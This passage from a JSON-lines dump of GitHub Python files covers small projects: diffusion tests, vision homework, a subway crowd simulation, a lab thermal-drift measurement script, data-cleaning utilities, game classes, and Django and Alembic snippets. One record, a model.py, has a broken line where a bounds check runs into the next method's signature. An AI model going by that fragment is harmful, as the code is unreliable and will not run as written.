'runwayml/stable-diffusion-v1-5',\n control_lora=control_lora,\n torch_dtype=torch.float16\n)\npipeline.scheduler = DPMSolverMultistepScheduler.from_config(pipeline.scheduler.config)\npipeline = pipeline.to(device)\nif is_xformers_available():\n pipeline.set_use_memory_efficient_attention_xformers(True)\ngenerator = torch.Generator(device=device).manual_seed(233)\nimages = []\nwith torch.no_grad():\n guide = Image.new('RGB', (512,512), (0,0,0))\n guide = [[guide], [guide]]\n images = pipeline(\n [\"Potrait of 1 beautiful girl, 8 k, ray tracing\", \"Potrait of 3 beautiful girls, 8 k, ray tracing\"], \n num_inference_steps=30, \n generator=generator, \n control_image=guide).images\n for i, img in enumerate(images):\n img.save(f'tmp/{i}.png')\n","repo_name":"across-stars/controllora_forked","sub_path":"test_arch.py","file_name":"test_arch.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26707711710","text":"import matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport numpy as np\nimport scipy.ndimage\nimport scipy.stats\n\n\n# ----------------------------------------------- #\n\n\n# Part 1 #\ndef similitudeMoments(img):\n img = img.astype(float)\n img /= np.max(img)\n\n mag = np.sum(img)\n\n x = np.zeros_like(img)\n y = np.zeros_like(img)\n\n for m in range(x.shape[0]):\n y[m,:] = float(m)\n for n in range(x.shape[1]):\n x[:,n] = float(n)\n\n xbar = np.sum(x*img) / mag\n ybar = np.sum(y*img) / mag\n\n def eta(img,i,j):\n e = np.sum( (x-xbar)**float(i) * (y-ybar)**float(j) * img ) / mag**(float(i+j)/2.+1.)\n return e\n\n\n return [eta(img,0,2), eta(img,0,3), eta(img,1,1), eta(img,1,2), eta(img,2,0), eta(img,2,1), eta(img,3,0)]\n\n\nfor n in range(1,5):\n filename = \"\".join( (\"boxIm\",n.__str__()) )\n I = plt.imread(filename+\".bmp\")\n print( similitudeMoments(I) )\n\n\n\n\n# Part 2 #\nX = np.loadtxt(\"eigdata.txt\")\nplt.figure()\nplt.plot(X[:,0], X[:,1], \"b.\")\nplt.gca().set_aspect('equal')\nplt.savefig(\"eigdata.png\")\n\nm = np.mean(X, axis=0)\nY = X.copy()\nY[:,0] -= m[0]\nY[:,1] -= m[1]\nplt.figure()\nplt.plot(Y[:,0], Y[:,1], \"r.\")\nplt.gca().set_aspect('equal')\nplt.savefig(\"eigdata_meansub.png\")\n\n\n\n\n# Part 3 #\nK = np.cov(Y.transpose())\n[w,v] = np.linalg.eig(K)\n\nt0 = np.arctan2(v[1,0], v[0,0])\n\ndef plotEllipse(w,t0,C, f):\n a = np.sqrt(w[0] * C)\n b = np.sqrt(w[1] * C)\n\n env = []\n for t in np.linspace( 0., 2.*np.pi, 128 ):\n x1 = a * np.cos(t)\n y1 = b * np.sin(t)\n x = x1 * np.cos(t0) - y1 * np.sin(t0)\n y = x1 * np.sin(t0) + y1 * np.cos(t0)\n env.append( [x,y] )\n\n env = np.array(env)\n f.plot( env[:,0], env[:,1], \"k\" )\n\n\nplotEllipse(w, t0, 3.**2, plt)\nplt.savefig(\"eigdata_ellipse.png\")\n\n\n\n\n# Part 4 #\nR = Y.copy()\nfor i in range(R.shape[0]):\n x1 = R[i,0]\n y1 = R[i,1]\n x = x1 * np.cos(t0) - y1 * np.sin(t0)\n y = x1 * np.sin(t0) + y1 * np.cos(t0)\n R[i,0] = x\n R[i,1] = y\n \nplt.figure()\nplt.plot(R[:,0], Y[:,1], \".r\")\nplt.gca().set_aspect('equal')\nplt.savefig(\"eigdata_rotated.png\")\n\n\n\n\n\n# Part 5 #\n(mu,sigma) = scipy.stats.norm.fit(R[:,1])\nplt.figure()\nn,bins,patches = plt.hist(R[:,1], density=True)\nx = np.linspace( bins[0], bins[-1], 128 )\ng = scipy.stats.norm(mu, sigma).pdf(x)\nplt.plot(x, g, \"-k\")\n\nplt.savefig(\"eigdata_hist.png\")\n\n \n","repo_name":"mycliu10/cs-ds-practices","sub_path":"OSU/ComputerVision/hw04/hw04.py","file_name":"hw04.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16581957127","text":"\"\"\"Class definition for filtering duplicate rows in each dataframe.\"\"\"\nfrom kaishi.core.pipeline_component import PipelineComponent\n\n\nclass FilterDuplicateRowsEachDataframe(PipelineComponent):\n \"\"\"Filter duplicate rows in each dataframe of a tabular dataset.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize new filter component.\"\"\"\n super().__init__()\n self.applies_to_available = True\n\n def __call__(self, dataset):\n \"\"\"Perform the filter operation on a given tabular dataset.\n\n :param dataset: dataset to perform operation on\n :type dataset: :class:`kaishi.tabular.dataset.TabularDataset`\n \"\"\"\n valid_indexes = dataset._get_indexes_with_valid_dataframe()\n targets = list(set(valid_indexes) & set(self.get_target_indexes(dataset)))\n for i in targets:\n dataset.files[i].df.drop_duplicates(inplace=True)\n","repo_name":"kungfuai/kaishi","sub_path":"kaishi/tabular/filters/duplicate_rows_each_dataframe.py","file_name":"duplicate_rows_each_dataframe.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"5954711246","text":"import random as rnd\nimport constant as c\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import defaultdict\nfrom time import sleep\n\nfrom agents import AGENT\nfrom restCell import RESTCELL\nfrom metroGenerator import METROGENERATOR\nfrom plotManager import PLOTMANAGER\n\n\nclass MODEL() :\n def __init__(self,n,m) -> None:\n self.n = n\n self.m = m\n\n self.metroGen = METROGENERATOR(n,m)\n\n self.agents = []\n self.restCells = []\n self.comfort = np.zeros((self.n,self.m))\n self.walls = np.zeros((self.n,self.m),dtype=int)\n self.walls = self.metroGen.generateBaseWalls(self.n,self.m)\n self.agent_allowed_to_stand_up = []\n\n self.verbose = True\n self.plotManager = PLOTMANAGER()\n \n def newStep(self):\n self.computeComfortMatrix()\n \n self.findGoalForEachAgent()\n\n self.findNewPosForEachAgent()\n\n self.solveConflictAndMoveAgent()\n\n if self.verbose:\n self.log()\n\n \n def log(self) -> None:\n print()\n print(\"Comfort Matrix\")\n print(self.comfort)\n\n print(\"Agent Goal\")\n for agent in self.agents:\n print(agent.goal)\n\n print(\"Agent Next Moves\")\n for agent in self.agents:\n print(agent.newPos)\n \n print(\"New agent position\")\n for agent in self.agents:\n print(agent.pos)\n print()\n\n \n def computeComfortMatrix(self) -> None:\n self.comfort = np.zeros((self.n,self.m))\n #if it's an agent, we lower the comfort :\n for agent in self.agents:\n for i in [-1,0,1] :\n for j in [-1,0,1]:\n moore = (agent.pos[0]+i, agent.pos[1]+j)\n if self.isValidPosition(moore) :\n self.comfort[moore]+= c.MalusAgent[1+i,1+j]\n \n #if it's a restcell, we add the value of its comfort: \n for restCell in self.restCells:\n #we add K_r to the comfort matrix \n self.comfort[restCell.pos]+=restCell.K_r\n \n def findGoalForEachAgent(self) -> None :\n for agent in self.agents:\n agent.findGoal(self.comfort)\n \n def findNewPosForEachAgent(self) -> None:\n\n self.conflict = defaultdict(lambda : [])\n for agent in self.agents:\n pos = agent.findNewPos()\n self.conflict[pos].append(agent)\n \n def isValidPosition(self,pos : tuple) -> bool:\n # check if position pos is in the range of our grid\n return ((0<=pos[0] None :\n #For each conflict (elements of self.conflict that have a lenth > 1)\n # Solve them by choosing a random agent\n # and the revert the newPos of the other agents to the current position\n for pos,agents in self.conflict.items():\n randomIndex = rnd.randrange(0,len(agents))\n for i,agent in enumerate(agents):\n if i == randomIndex :\n agent.pos = agent.newPos\n \n def totalComfort(self) :\n return sum(self.comfort[agent.pos] for agent in self.agents)\n\n def plot(self):\n #étape finale : faire une fonction qui plot ce à quoi ressemble notre wagon à la fin \n #pour l'instant le wagon est vide, il faut designer le metroGenerator\n end_disposition=np.zeros((self.n,self.m)) #à remplacer par la metromap définie dans metroGenerator \n for agent in self.agents:\n end_disposition[agent.pos]=2\n\n fig = plt.figure(figsize=(8,6))\n #plt.imshow(X,cmap=\"inferno\")\n plt.title(\"Plot 2D array of our metro\")\n plt.colorbar()\n plt.show()\n \n def plot_Nb(self):\n self.plotManager.plotNb(self)\n \n def clear(self):\n self.plotManager.clear()\n\n def play_model(self,t):\n self.plot_Nb()\n for i in range (0,t):\n self.clear() \n self.newStep()\n self.clear() \n self.plot_Nb()\n sleep(1)\n \n\nif __name__ == \"__main__\":\n mymodel = MODEL(3,4)\n mymodel.agents = [AGENT((0,0),mymodel),AGENT((1,1),mymodel)]\n mymodel.restCells = [RESTCELL((1,0),15)]\n \n mymodel.newStep()\n mymodel.newStep()\n\n \n","repo_name":"drblobfish/subway-crowd-cellular-automata","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38391645852","text":"#!/usr/bin/env python3\n# LDC_Commands.py\n\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nfrom tkinter import Tk\nfrom tkinter.filedialog import askdirectory\nfrom datetime import datetime\n\n\nclass LDC:\n \"\"\"\n Sets up the commands to control the Leakage Detection Circuit board alongside an instrument with SCPI communication\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Instantiates the class, all necessary variables and modules\n \"\"\"\n import pydrs\n from SCPI_Commands import SCPI\n\n self.drs = pydrs.SerialDRS()\n port_num = int(input(\"Insert the number of the COM port: \"))\n com_port = 'COM' + str(port_num)\n comunic_instrumentip = input(\"Insert instrument ip: \")\n self.drs.connect(com_port) # PyDRS Communication with IIB\n instrument = 'TCPIP::' + str(comunic_instrumentip) + '::inst0::INSTR'\n self.scpi = SCPI(instrument)\n self.frequency = 10\n self.period = 1 / self.frequency\n self.mean = 0\n self.maximum = 0\n self.minimum = 0\n self.ppc = 0\n self.mean_error = 0\n self.std_dev = 0\n self.test_time = 0\n self.samples = []\n self.temperature_samples = []\n self.time_samples = []\n self.error = []\n print(\"LDC functions enabled!\")\n\n def thermal_drift_test(self, duration):\n \"\"\"\n Reads the ground leakage current detected with the LDC board\n Reader thermal drift test\n\n :param duration: Duration of the measurement in seconds\n :type duration: int\n\n :return: The measured values for leakage current and thermal drift test\n :rtype: str\n \"\"\"\n self.samples.clear()\n self.time_samples.clear()\n self.error.clear()\n print(\"Acquisition in progress...\\n\")\n z = 0\n for x in range(int(self.frequency * duration)):\n current_value = self.scpi.instrument.query_ascii_values(':MEASure:CURRent:DC? (%s)' % '@1')\n self.temperature_samples.append((self.drs.read_bsmp_variable(52, 'float')))\n self.samples.append((self.drs.read_bsmp_variable(53, 'float'))*1000)\n self.time_samples.append(round(x * self.period, 2))\n self.error.append((current_value[0]*1000) - self.samples[x])\n time.sleep(self.period)\n np_samples = np.array(self.samples)\n np_error = np.array(self.error)\n z = z + 1\n if z == 10:\n print('\\n''\\n', (float(self.time_samples[-1])+0.1), \"s\", '\\n', (float(self.drs.read_bsmp_variable(52, 'float'))), \"°C\")\n z = 0\n self.test_time = datetime.today()\n self.mean = np_samples.mean()\n self.maximum = np_samples.max()\n self.minimum = np_samples.min()\n self.ppc = (np_samples.max() - np_samples.min())\n self.mean_error = abs(np_error.mean())\n self.std_dev = np_samples.std()\n return print(\"Mean: {0:.3f} mA\\n\"\n \"Maximum: {1:.3f} mA\\n\"\n \"Minimum: {2:.3f} mA\\n\"\n \"Peak to peak: {3:.3f} mA\\n\"\n \"Mean Error: {4:.3f} mA\\n\"\n \"Standard Deviation: {5:.3f} mA\\n\".format(self.mean, self.maximum, self.minimum,\n self.ppc, self.mean_error, self.std_dev))\n\n def save_csv_file(self, file_name='THERMAL DRIFT'):\n \"\"\"\n Saves the data of a ground leakage measurement in a csv format file\n :argument file_name: Gives a custom name to the file. Default gives 'Leakage Current'\n\n :return: A string confirming the execution\n :rtype: str\n \"\"\"\n test_name = self.test_time.strftime('%d_%m_%Y-%H_%M_%S')\n name = file_name+'-'+test_name+'.csv'\n data = [['Time'], ['Leakage Current'] , ['Temperature']]\n column0 = data[0]\n column1 = data[1]\n column2 = data[2]\n for row in range(len(self.samples)):\n column0.append(self.time_samples[row])\n column1.append(self.samples[row])\n column2.append(self.temperature_samples[row])\n np.savetxt(name, [p for p in zip(column0, column1, column2)], delimiter=',', fmt='%s')\n return \"CSV current file named '{}' saved successfully!\".format(name)\n\n def plot_graphic(self, graph_name='THERMAL DRIFT'):\n \"\"\"\n Plots the graphic of the ground leakage measurement\n\n :return: Return the matplotlib window with the measurement plot\n \"\"\"\n fig, ax = plt.subplots(1, 1, figsize=(15, 5))\n color='tab:blue'\n ax.locator_params(axis='y', tight=True, nbins=10)\n ax.locator_params(axis='x', tight=True, nbins=25)\n ax.plot(self.time_samples, self.samples)\n plt.xlabel('Time [s]')\n plt.ylabel('Leakage Current [mA]', color=color)\n plt.grid(True)\n ax1 = ax.twinx()\n color = 'tab:red'\n ax1.set_ylabel('Temperature [°C]', color=color)\n ax1.plot(self.time_samples, self.temperature_samples, color=color)\n ax1.locator_params(axis='y', tight=True, nbins=10)\n plt.title(graph_name)\n return plt.show()\n\n def save_graphic(self, graph_name='THERMAL DRIFT'):\n \"\"\"\n Saves a jpg file of the ground leakage graphic\n\n :return: Returns a string confirming the jpg file saving\n :rtype: str\n \"\"\"\n test_name = self.test_time.strftime('%d_%m_%Y-%H_%M_%S')\n name = graph_name+'-'+test_name+'.jpg'\n color = 'tab:blue'\n fig, ax = plt.subplots(1, 1, figsize=(10, 5))\n ax.locator_params(axis='y', tight=True, nbins=10)\n ax.locator_params(axis='x', tight=True, nbins=25)\n ax.plot(self.time_samples, self.samples)\n plt.xlabel('Time [s]')\n plt.ylabel('Leakage Current [mA]', color=color)\n plt.grid(True)\n ax1 = ax.twinx()\n color = 'tab:red'\n ax1.set_ylabel('Temperature [°C]', color=color)\n ax1.plot(self.time_samples, self.temperature_samples, color=color)\n ax1.locator_params(axis='y', tight=True, nbins=10)\n plt.title(graph_name)\n plt.savefig(name)\n plt.close()\n return \"Graphic file named '{}' saved successfully!\".format(name)\n\n def degauss(self):\n self.scpi.disable_output()\n self.drs.reset_interlocks()\n time.sleep(0.3)\n self.drs.reset_interlocks()\n time.sleep(0.15)\n return \"Degaussing process applied!\"\n\n\nif __name__ == '__main__':\n cwd = os.getcwd()\n ldc = LDC()\n read_current = float(input(\"Insert the desired current, in Amperes: \"))\n read_duration = int(input(\"Insert the duration of the ground leakage measurent, in seconds: \"))\n apply_degauss = int(input(\"Apply the degaussing process? 1(yes)/0(No):\"))\n if apply_degauss == 1:\n ldc.degauss()\n elif apply_degauss == 0:\n pass\n ldc.scpi.set_current(read_current)\n time.sleep(0.15)\n ldc.thermal_drift_test(read_duration)\n ldc.scpi.disable_output()\n ldc.plot_graphic()\n answer = int(input(\"Save plot and csv file? 1(yes)/0(No): \"))\n if answer == 1:\n Tk().withdraw()\n path = askdirectory(title='Select Folder')\n ldc_test = 'LDC_Test-'+ldc.test_time.strftime('%d_%m_%Y-%H_%M_%S')\n os.makedirs(os.path.join(path, ldc_test))\n os.chdir(os.path.join(path, ldc_test))\n ldc.save_graphic()\n ldc.save_csv_file()\n print(\"LDC Test files saved {}!\".format(ldc_test))\n os.chdir(cwd)\n exit()\n elif answer == 0:\n exit()\n","repo_name":"cnpem-sei/ldc-sw","sub_path":"LDC Board Test/Temperature_Drift.py","file_name":"Temperature_Drift.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7970072859","text":"from app.models import db, Artist\n\n\ndef seed_artists():\n fugal = Artist(\n artistname='Fugal',\n avatar='https://imgproxy.ra.co/_/quality:100/h:180/w:180/rt:fill/gravity:sm/plain//images/profiles/fugal.jpg',\n bio='Berlin-based Korean-American techno artist from Seattle. His style moves in a space of dynamic tension between dense, insistent rhythmics and nuanced emotion. A resident DJ and producer of the singular collective, secondnature.',\n user_id=1\n )\n db.session.add(fugal)\n db.session.commit()\n\n\ndef undo_artists():\n db.session.execute('TRUNCATE artists RESTART IDENTITY CASCADE;')\n db.session.commit()\n","repo_name":"nathanblaz/tunevillage-app","sub_path":"app/seeds/artists.py","file_name":"artists.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25100108432","text":"import csv\nfrom datetime import datetime\nimport logging\n\n\ndef read_data(file_path):\n ''' read csv file and rows based on header leangth. Return fitting and missformatted data'''\n with open(file_path) as f:\n reader = csv.reader(f, delimiter=',')\n data = []\n missformatted_data = []\n for i, row in enumerate(reader):\n if i == 0:\n header_len = len(row)\n data.append(row)\n missformatted_data.append(row)\n else:\n if len(row) == header_len:\n data.append(row)\n else:\n missformatted_data.append(row)\n return data, missformatted_data\n\n\ndef filter_data(data, col_name, value):\n ''' select rows that has specified collumn value '''\n filtered_data = []\n filtered_data.append(data[0])\n column_id = data[0].index(col_name)\n for row in data[1:]:\n if row[column_id] == value:\n filtered_data.append(row)\n return filtered_data\n\n\ndef join_columns(data, col_name_1, col_name_2, delimiter):\n ''' join values from two columns '''\n col_id_1 = data[0].index(col_name_1)\n col_id_2 = data[0].index(col_name_2)\n new_col = []\n for row in data[1:]:\n joined_val = delimiter.join([str(row[col_id_1]), str(row[col_id_2])])\n new_col.append(joined_val)\n return new_col\n\n\ndef add_column(data, col_name, col_values):\n ''' add new column values to the end of the rows '''\n data = data.copy()\n data[0].append(col_name)\n for row_id in range(len(data) - 1):\n data[row_id + 1].append(col_values[row_id])\n return data\n\n\ndef format_names(data):\n ''' join first and last name '''\n col_name_1 = 'CandidateFirstName'\n col_name_2 = 'CandidateLastName'\n delimiter = ' '\n joined_col_name = 'CandidateName'\n joined_values = join_columns(data, col_name_1, col_name_2, delimiter)\n data = add_column(data, joined_col_name, joined_values)\n return data\n\n\ndef convert_to_iso(data, col_name):\n ''' convert date to iso format, write None if cannot convert '''\n col_id = data[0].index(col_name)\n new_values = []\n for row in data[1:]:\n try:\n new_values.append(datetime.strptime(row[col_id], '%m/%d/%Y').date())\n except Exception as e:\n new_values.append(None)\n return new_values\n\n\ndef format_dates(data):\n ''' converted dates to ISO format and add to data '''\n col_names = ['PeriodBegining', 'PeriodEnding']\n for col_name in col_names:\n converted_values = convert_to_iso(data, col_name)\n new_col_name = col_name + 'Iso'\n data = add_column(data, new_col_name, converted_values)\n return data\n\n\ndef find_col_ids_by_names(header, col_names):\n ''' find column ids in the header '''\n col_ids = [header.index(col_name) for col_name in col_names]\n return col_ids\n\n\ndef select_cols(data, col_names):\n ''' select columns from data'''\n selected_data = []\n col_ids = find_col_ids_by_names(data[0], col_names)\n selected_data.append([data[0][i] for i in col_ids])\n for row in data[1:]:\n selected_data.append([row[i] for i in col_ids])\n return selected_data\n\n\ndef remove_none(data, col_names):\n ''' split data into rows that contain None and those that do not '''\n clean_data = []\n rows_with_none = []\n clean_data.append(data[0])\n rows_with_none.append(data[0])\n col_ids = find_col_ids_by_names(data[0], col_names)\n for row in data[1:]:\n selected_values = [row[i] for i in col_ids]\n if None in selected_values:\n rows_with_none.append(row)\n else:\n clean_data.append(row)\n return clean_data, rows_with_none\n\n\ndef write_to_csv(data, file_name):\n with open(file_name, 'w', newline='') as f:\n writer = csv.writer(f)\n for row in data:\n writer.writerow(row)\n\n\ndef process_data(file_path, output_path, misformatted_output_path):\n ''' read, clean, format ,and save data '''\n data, misformatted = read_data(file_path)\n formatted_data = filter_data(data, 'CandidateOrCommittee', 'COH')\n formatted_data = format_names(formatted_data)\n formatted_data = format_dates(formatted_data)\n clean_data, no_dates_data = remove_none(\n formatted_data, ['PeriodBeginingIso', 'PeriodEndingIso'])\n no_dates_data = select_cols(no_dates_data, data[0])\n misformatted += no_dates_data[1:]\n col_names = ['CandidateName', 'PeriodBeginingIso', 'PeriodEndingIso',\n 'TransactionID', 'TransactionType', 'TransactionAmount']\n selected_data = select_cols(clean_data, col_names)\n\n write_to_csv(selected_data, output_path)\n write_to_csv(misformatted, misformatted_output_path)\n\n\nif __name__ == '__main__':\n file_path = 'data/transactions.csv'\n output_path = 'data/processed_transactions.csv'\n misformatted_output_path = 'data/error.log'\n process_data(file_path, output_path, misformatted_output_path)\n","repo_name":"augzal/technical_task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26692470005","text":"import numpy as np\nimport pandas as pd\nfrom skimage.io import imread\nfrom skimage.transform import resize\n\n###################################################################################################\n# Define Variables¶\n\nimage_shape = (768, 768)\nIMG_CHANNELS = 3\nTARGET_WIDTH = 128\nTARGET_HEIGHT = 128\n\nno_mask = np.zeros(image_shape[0]*image_shape[1], dtype=np.uint8)\n\n###################################################################################################\n# Returns the run-length encoding (RLE) of the input image as a string formatted sequence.\n\ndef rle_encode(img):\n pixels = img.flatten()\n pixels = np.concatenate([[0], pixels, [0]])\n runs = np.where(pixels[1:] != pixels[:-1])[0] + 1\n runs[1::2] -= runs[::2]\n rle = ' '.join(str(x) for x in runs)\n return rle\n\n\n###################################################################################################\n# Decodes the run-length encoded (RLE) mask back into its original 2D binary mask representation.\n\ndef rle_decode(mask_rle, shape=image_shape):\n if pd.isnull(mask_rle):\n img = no_mask\n return img.reshape(shape).T\n s = mask_rle.split()\n starts, lengths = [np.asarray(x, dtype = int) for x in (s[0:][::2], s[1:][::2])]\n\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0] * shape[1], dtype = np.uint8)\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape).T\n\n\n###################################################################################################\n# Reads and preprocesses an image\n\ndef get_image(image_name):\n img = imread('data/train_v2/' + image_name)[:, :, :IMG_CHANNELS]\n img = resize(img, (TARGET_WIDTH, TARGET_HEIGHT), mode = 'constant', preserve_range = True)\n return img\n\n\n###################################################################################################\n# Decodes and preprocesses a run-length encoded (RLE) mask.\n\ndef get_mask(code):\n img = rle_decode(code)\n img = resize(img, (TARGET_WIDTH, TARGET_HEIGHT, 1), mode = 'constant', preserve_range = True)\n return img\n\n###################################################################################################\n# Reads and preprocesses test image\n\ndef get_test_image(image_name):\n img = imread('../input/test_v2/' + image_name)[:, :, :IMG_CHANNELS]\n img = resize(img, (TARGET_WIDTH, TARGET_HEIGHT), mode='constant', preserve_range=True)\n return img\n###################################################################################################\n# Creates a generator that yields batches of preprocessed test images.\n\ndef create_test_generator(precess_batch_size, sub_df):\n while True:\n for k, ix in sub_df.groupby(np.arange(sub_df.shape[0]) // precess_batch_size):\n imgs = []\n for index, row in ix.iterrows():\n original_img = get_test_image(row.ImageId) / 255.0\n imgs.append(original_img)\n\n imgs = np.array(imgs)\n yield imgs\n\n###################################################################################################\n# Creates a generator that yields batches of preprocessed images and corresponding masks.\n\ndef create_image_generator(precess_batch_size, data_df):\n while True:\n for k, group_df in data_df.groupby(np.arange(data_df.shape[0]) // precess_batch_size):\n imgs = []\n labels = []\n for index, row in group_df.iterrows():\n # images\n original_img = get_image(row.ImageId) / 255.0\n # masks\n mask = get_mask(row.EncodedPixels) / 255.0\n\n imgs.append(original_img)\n labels.append(mask)\n\n imgs = np.array(imgs)\n labels = np.array(labels)\n yield imgs, labels","repo_name":"Zooll51/AirbusShipDetection","sub_path":"OtherFile.py","file_name":"OtherFile.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6480248544","text":"import sys\r\ndata = []\r\nn = 100 # assuming n has a value of 100\r\nd = 0\r\nfor k in range(n): # looping for 0 to n-1\r\n a = len(data)\r\n b = sys.getsizeof(data)\r\n if b != d and a >= 1: # checking condition for finding the length and size in bytes\r\n print(\"length: {0:3d}; Size in bytes: {1:4d}\".format(a-1, d))\r\n d = b # assigning the value of b to d\r\n data.append(None)","repo_name":"Yozi47/Data-Structure-and-Algorithms-Class","sub_path":"Homework 5/R 5.2.py","file_name":"R 5.2.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1844611828","text":"from const import *\nfrom event import *\n\n\n\ndef init(self):\n self.typ = BUFF_DYNAMIC\n self.original = True\n self.visable = False\n self.name = \"烈焰小鬼\"\n self.description = \"战吼: 对最多一个角色造成1点魔法伤害。\"\n\n # 战吼 造成1点魔法伤害\n def warcry(self, old_event):\n \n # 判断是否有角色可以造成伤害\n group = []\n for card in self.system.cards:\n if (card.place == PLACE_FIELD) and (not card.unselectable(card, self.card.player)):\n group.append(card)\n for player in self.system.players:\n if player.alive:\n group.append(player)\n if len(group) <= 0:\n return False\n \n self.system.yell(self.card, 0)\n text = \"请选择至多一个角色来造成1点魔法伤害。\"\n target = self.card.player.select(group, 1, text, 1, True, self)\n \n if len(target) <= 0:\n return False\n \n sublists = [\"fireball_sub_1\", \"fireball_sub_2\", \"fireball_sub_3\"]\n self.system.playeffect(\"fireball\", sublists, self.card, target[0])\n self.system.yell(self.card)\n \n damage = []\n for character in target:\n damage.append(1)\n param = [target, self.card, damage, DAMAGE_MAGICAL]\n event = Event(self.system, EVENT_DAMAGE, self, param)\n event.do()\n\n return True\n self.warcry = warcry\n","repo_name":"zblcm/python-StoneAsh","sub_path":"server/buffs/b0000000000_000.py","file_name":"b0000000000_000.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4412305761","text":"\n\n#思索再三我应该抽象出来一个叫CardGroup的概念,然后整个manger可以管理全部的CardGroup\n#一张卡牌,只能属于某一个group\nclass CardGroup():\n card_list = []\n processBar = None\n batch = None\n \"\"\"docstring for Card_manger\"\"\"\n def __init__(self,batch):\n self.batch=batch\n pass\n\n #卡牌会使用joinCardGroup(self,cardGroup:CardGroup)来加入某个卡组\n def join(self,card):\n self.card_list.append(card)\n return self\n\n #从卡组列表当中剔除掉这张卡\n def remove(self,card):\n try:\n self.card_list.remove(card)\n except Exception as e:\n #防御性质的编程\n print(\"CardGroup->remove ERROR: There is no card in card_list\")\n print(e)\n return False\n else:\n return True\n\n #返回所有的牌\n def getCardsList(self):\n return self.card_list\n\n #给这个卡组附加上一个头顶的进度条组件\n def uiAttchProcessBar(self,processBar):\n #试图去取卡组的第一张牌\n prime_card = self.card_list[0]\n #如果卡组的第一个元素是存在的\n if prime_card:\n px = prime_card.x\n py = prime_card.y + 80\n pwidth = 5 #初始的宽度,给5个像素吧\n pheight = 10\n #以上四个参数取自于card的大小,这个以后再说\n color=(255, 0, 0)\n\n processBar.x=px\n processBar.y=py\n processBar.width = pwidth\n processBar.height = pheight\n processBar.color = color\n\n self.processBar=processBar\n\n #返回这个卡组的进度条组件\n def getProcessBar(self):\n return self.processBar\n\n #移除这个卡组的进度条组件\n def removeProcessBar(self):\n self.processBar = None\n","repo_name":"lemonhall/card_game","sub_path":"card_group.py","file_name":"card_group.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9628670273","text":"from django.urls import path\n\nfrom myapp.views import alumno_view, aula_view, form_alumno, form_profesor, form_view, index_view, profesor_view\n\napp_name = 'myapp'\n\nurlpatterns = [\n path(\"\", index_view.as_view(), name=\"onlyAuthor\"),\n path(\"formulario/\", form_view.as_view(), name=\"formulario\"),\n path(\"formulario//\", aula_view, name=\"aula\"),\n \n path(\"formAlum/\", form_alumno.as_view(), name=\"formulario_alumno\"),\n path(\"formAlum//\", alumno_view, name=\"alumno\"),\n\n path(\"formProf/\", form_profesor.as_view(), name=\"formulario_profesor\"),\n path(\"formProf//\", profesor_view, name=\"profesor\"),\n\n]","repo_name":"TimRobles/Django-silabuz","sub_path":"mysite/myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"69841596268","text":"from datetime import datetime\nfrom eodal.config import get_settings\nfrom eodal.core.sensors import Sentinel1\nfrom eodal.mapper.feature import Feature\nfrom eodal.mapper.filter import Filter\nfrom eodal.mapper.mapper import Mapper, MapperConfigs\nfrom shapely.geometry import box\n\nSettings = get_settings()\nSettings.USE_STAC = True\n\nif __name__ == '__main__':\n\n collection = 'sentinel1-grd'\n # define time period\n time_start = datetime(2020, 7, 1)\n time_end = datetime(2020, 7, 15)\n\n # define input geometry\n bbox = [9.0924, 47.5992, 9.2190, 47.7295]\n geom = box(*bbox)\n metadata_filters = [Filter('product_type', '==', 'RTC')]\n\n feature = Feature(\n name='Test Area',\n geometry=geom,\n epsg=4326,\n attributes={'id': 1}\n )\n mapper_configs = MapperConfigs(\n collection=collection,\n time_start=time_start,\n time_end=time_end,\n feature=feature,\n metadata_filters=metadata_filters\n )\n mapper = Mapper(mapper_configs)\n mapper.query_scenes()\n\n mapper.metadata\n\n scene_kwargs = {\n 'scene_constructor': Sentinel1.from_safe,\n 'scene_constructor_kwargs': {}\n }\n mapper.load_scenes(scene_kwargs=scene_kwargs)\n f = mapper.data.plot(band_selection=['VH'], figsize=(20, 10))\n","repo_name":"EOA-team/eodal","sub_path":"examples/sentinel1_mapper.py","file_name":"sentinel1_mapper.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"37"} +{"seq_id":"70994876267","text":"\"\"\"Add change_tag_expiration log type\n\nRevision ID: d8989249f8f6\nRevises: 